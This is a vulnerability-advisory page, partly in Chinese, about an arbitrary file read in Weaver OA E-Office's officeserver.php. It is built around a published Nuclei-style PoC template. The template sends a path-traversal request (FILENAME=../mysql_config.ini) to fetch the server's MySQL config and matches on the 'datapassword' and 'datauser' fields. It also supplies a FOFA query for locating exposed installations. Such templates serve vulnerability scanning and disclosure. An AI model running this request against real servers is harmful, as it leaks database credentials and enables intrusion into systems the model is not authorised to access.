weaver-officeserver-lfi: OA E-Office officeserver.php Arbitrary File Read

日期: 2025-08-01 | 影响软件: weaver-officeserver | POC: 已公开

漏洞描述

There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.

PoC代码[已公开]

id: weaver-officeserver-lfi

info:
  name: OA E-Office officeserver.php Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: weaver
    product: e-office
    fofa-query: app="泛微-EOffice"
  tags: weaver,e-cology,oa,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "datapassword ="
          - "datauser ="
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205bb27c737259261aee0c1d85e225e2032de5b5c11433f8877e8a956447457730022100b5eb3c44d141077b960c94a13554701aaaae1714a33b5a95476e2d71b7429e60:922c64590222798bb761d5b6d8e72950

相关漏洞推荐